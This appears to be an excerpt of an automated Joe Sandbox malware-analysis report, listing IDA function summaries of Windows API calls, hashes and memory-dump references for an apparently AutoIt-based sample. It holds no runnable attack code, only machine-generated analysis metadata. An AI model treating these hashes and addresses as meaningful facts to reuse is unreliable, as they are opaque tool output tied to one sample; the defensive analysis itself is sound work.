                                                            • Opcode ID: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                            • Instruction ID: 159165bab53b04d3cbba9e0d8ed23f629fb96fbb8b96a1f823f3c86320dce82d
                                                            • Opcode Fuzzy Hash: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                            • Instruction Fuzzy Hash: 7111597250120DBBDF018FA4DD49BEF7BA9EF08305F144069FE04A2161CB769E69EB64
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free$_abort
                                                            • String ID:
                                                            • API String ID: 3160817290-0
                                                            • Opcode ID: d67fea1190316edf6f7b9199995b03e5a785595fe022cb6c600aeda7acefa4a0
                                                            • Instruction ID: cafcf9f3c20d434d6ddff88ced4437c3e8d228d4d494313154b11351fe91b82e
                                                            • Opcode Fuzzy Hash: d67fea1190316edf6f7b9199995b03e5a785595fe022cb6c600aeda7acefa4a0
                                                            • Instruction Fuzzy Hash: 30F0F43690060337CE11377DAC8AE7A22D69BC2761F2409B5F815A32A2EF658C02B161
                                                            APIs
                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                            • Instruction ID: 92342a6601e26d0a7fde7352a7d9a4d166513956845c1039e3d7dfd742296845
                                                            • Opcode Fuzzy Hash: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                            • Instruction Fuzzy Hash: BC016CB09017597DE3008F5A8C85B56FFA8FF19354F00411FA15C87941C7F5A868CBE5
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 839392675-0
                                                            • Opcode ID: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                            • Instruction ID: 8521796c5e9ebcca20b77e734ec20d152baa00e403791343a5e797bd2ed800e1
                                                            • Opcode Fuzzy Hash: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                            • Instruction Fuzzy Hash: 7EF06231240558BBD3215B929C0DEAF7A7CEFC6B11F00057DF904D1050EBA41A0587B9
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 00467243
                                                            • EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E
                                                              • Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
                                                            • LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3495660284-0
                                                            • Opcode ID: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                                            • Instruction ID: 24fb6cd7f7b8029ee4f25158e92bed301f8e8da2948c51d11c28ada49318010c
                                                            • Opcode Fuzzy Hash: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                                            • Instruction Fuzzy Hash: DDF08236540A12EBD7111B64ED4C9DF7739FF45702B1009BAF503A10A0DB7F5819CB59
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
                                                            • UnloadUserProfile.USERENV(?,?), ref: 004589A9
                                                            • CloseHandle.KERNEL32(?), ref: 004589B2
                                                            • CloseHandle.KERNEL32(?), ref: 004589BA
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
                                                            • HeapFree.KERNEL32(00000000), ref: 004589CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            • Opcode ID: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                                            • Instruction ID: 8deadb4208ce055a946e280c670b0e99f3db2db319c6731f307d9ea981cf4585
                                                            • Opcode Fuzzy Hash: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                                            • Instruction Fuzzy Hash: 94E0C236004401FBDA011FE1EC0C90ABB69FB89322B108A38F219C1074CB32A828DB58
                                                            APIs
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 004576EA
                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457702
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457727
                                                            • _memcmp.LIBCMT ref: 00457748
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: FromProg$FreeTask_memcmp
                                                            • String ID: ,,I
                                                            • API String ID: 314563124-4163367948
                                                            • Opcode ID: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
                                                            • Instruction ID: be765e1d57b8148d1cf66b3d68047348fb9be163096bbb02cdfcec4a4c199039
                                                            • Opcode Fuzzy Hash: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
                                                            • Instruction Fuzzy Hash: 08815D71A00109EFCB00DFA4D984EEEB7B9FF89315F204469F505AB251DB75AE0ACB64
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00478613
                                                            • CharUpperBuffW.USER32(?,?), ref: 00478722
                                                            • VariantClear.OLEAUT32(?), ref: 0047889A
                                                              • Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
                                                              • Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
                                                              • Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4237274167-1221869570
                                                            • Opcode ID: 67a04362a4a4e5cdd5187d63ef75db61e1a0db8a2e4665fdea0e53359ee5c90a
                                                            • Instruction ID: 60eff2204552638baa50968c5b1ec12482493ff8819337d84e8636a8f0030324
                                                            • Opcode Fuzzy Hash: 67a04362a4a4e5cdd5187d63ef75db61e1a0db8a2e4665fdea0e53359ee5c90a
                                                            • Instruction Fuzzy Hash: E1916D756043019FC710EF25C48499BB7E4EF89718F14896EF88A9B3A2DB34ED06CB56
                                                            APIs
                                                              • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                            • _memset.LIBCMT ref: 00462B87
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                            • String ID: 0
                                                            • API String ID: 4152858687-4108050209
                                                            • Opcode ID: 0aed8f6fd7c25f2679bd7f58e0c29505b902ecd34c276bf6b7a94984eaad8c9f
                                                            • Instruction ID: 8d65d54c91bb2834d650baaa5c58db0a2d3f708132dab7008ae6ceb83fe6ffca
                                                            • Opcode Fuzzy Hash: 0aed8f6fd7c25f2679bd7f58e0c29505b902ecd34c276bf6b7a94984eaad8c9f
                                                            • Instruction Fuzzy Hash: BF51DD71208B01AED7249E28DA44A6F77E8EF44314F040A2FF880D7291EBB8DC44875B
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_free
                                                            • String ID: 3cA$_A
                                                            • API String ID: 2620147621-3480954128
                                                            • Opcode ID: 35c511ca6f8e2fb99b164d345fb57b3550685404656f9d903254bb67667d585c
                                                            • Instruction ID: 850dd104c1974142ce8a52b298ec70faaced32133f8a19a743ede36878807482
                                                            • Opcode Fuzzy Hash: 35c511ca6f8e2fb99b164d345fb57b3550685404656f9d903254bb67667d585c
                                                            • Instruction Fuzzy Hash: C7518C716043418FDB24CF29C840BABBBE1FF85304F49482EE98987351DB39E941CB4A
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _memset$_memmove
                                                            • String ID: 3cA$ERCP
                                                            • API String ID: 2532777613-1471582817
                                                            • Opcode ID: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                                            • Instruction ID: eaf8e981165fb7e982de03985e75bf568e49202a02b644e32a28802e4b47c64a
                                                            • Opcode Fuzzy Hash: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                                            • Instruction Fuzzy Hash: 02518C71A00709DBDB24DF65C9817EBB7F4AF04304F2085AFE94A86241E778EA858B59
                                                            APIs
                                                            • _memset.LIBCMT ref: 004627C0
                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem_memset
                                                            • String ID: 0
                                                            • API String ID: 1173514356-4108050209
                                                            • Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                            • Instruction ID: 6162d5963bf1ca612739d8e457cf9df7481532cfa70a9704744149088ee17d1e
                                                            • Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                            • Instruction Fuzzy Hash: F141AE70604701AFD720EF29CD44B1BBBE4AF84314F044A2EF96597391E7B8A905CB6B
                                                            APIs
                                                              • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                              • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57
                                                              • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_memmove$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 365058703-1403004172
                                                            • Opcode ID: 3c436a4330a17279aeb7abfb2aba741a6c24e26a56e1fd0586ee6394ac518e92
                                                            • Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
                                                            • Opcode Fuzzy Hash: 3c436a4330a17279aeb7abfb2aba741a6c24e26a56e1fd0586ee6394ac518e92
                                                            • Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28
                                                            APIs
                                                              • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                              • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                              • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
                                                            • LoadLibraryW.KERNEL32(?), ref: 00486468
                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
                                                            • DestroyWindow.USER32(?), ref: 00486485
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                            • String ID: SysAnimate32
                                                            • API String ID: 4146253029-1011021900
                                                            • Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                            • Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
                                                            • Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                            • Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768
                                                            APIs
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00466E01
                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                            • Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
                                                            • Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                            • Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00466E89
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
